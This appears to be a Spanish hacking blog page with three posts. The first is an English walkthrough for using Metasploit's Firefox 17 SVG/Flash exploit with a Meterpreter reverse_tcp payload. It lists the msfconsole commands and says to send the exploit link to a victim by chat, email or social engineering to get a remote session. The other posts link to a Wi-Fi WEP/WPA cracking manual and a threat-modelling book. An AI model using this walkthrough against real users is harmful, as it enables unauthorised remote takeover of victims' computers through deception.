Páginas que te pueden interesar

Mostrando entradas con la etiqueta Cracking. Mostrar todas las entradas
Mostrando entradas con la etiqueta Cracking. Mostrar todas las entradas

sábado, 6 de diciembre de 2014

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

Hack Windows, Linux or MAC PC using Firefox 17.0.1 + Flash Privileged Code Injection

This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the chrome:// context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Note: Flash is used here to trigger the exploit but any Firefox plugin with script access should be able to trigger it.

Exploit Targets

Firefox 17.0.1
Windows PC
Linux PC
MAC OS X PC

Requirement

Attacker: Backtrack 5
Victim PC: Windows 7
Open backtrack terminal type msfconsole
Now type use exploit/multi/browser/firefox_svg_plugin
msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
msf exploit (firefox_svg_plugin)>set srvhost 192.168.1.167 (This must be an address on the local machine)
msf exploit (firefox_svg_plugin)>set uripath / (The Url to use for this exploit)
msf exploit (firefox_svg_plugin)>exploit

Now an URL you should give to your victim http://192.168.1.167:8080/

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

























Fuente 1: http://adf.ly/v22vP
Fuente 2: http://sh.st/iWony



viernes, 28 de noviembre de 2014

Cracking WEP, WPA, WPA2-PSK


---------------------------------------------------------------------------------
Cracking WEP, WPA, WPA2-PSK
---------------------------------------------------------------------------------






Este es un manual donde se les explica como Crackear casi cualquier tipo de seguridad o encriptamiento de Red Wifi.


El Manual lo puedes descargar desde uno de los enlaces mostrados.
---------------------------------------------------------------------------------
Descargar Aquí: http://adf.ly/tzRkk
Descargar Aquí: http://sh.st/uUkaJ
---------------------------------------------------------------------------------


Espero lo disfrutes, que pases un buen día. "Side Master".

Analisis y Modelado de Amenazas

Analisis y Modelado de Amenazas.
----------------------------------------------------------------------------



 
Es un análisis que ayuda a determinar los riesgos de seguridad que pueden acaecer en un producto, aplicación, red o entorno, así como la forma en la que se aparecen los ataques.

El objetivo consiste en determinar cuáles son las amenazas que requieren mitigación y los modos de hacerlo.



Ahora bien, le comparto este grandioso libro en donde podras acceder a buena información sobre como realizar un Analisis y Modelado de Amenazas.

Enlaces de descarga:
----------------------------------------------------------------------------------
Descargar Aquí: http://adf.ly/tzR5o
Descargar Aquí: http://sh.st/uUjVz
----------------------------------------------------------------------------------



Espero logres adquirir el conocimiento deseado. No olvides compartir para que otros aprendan o les hagan llegar el contenido.

Hasta el próximo POST (Construye tu propia antena Wifi).
"Side Master".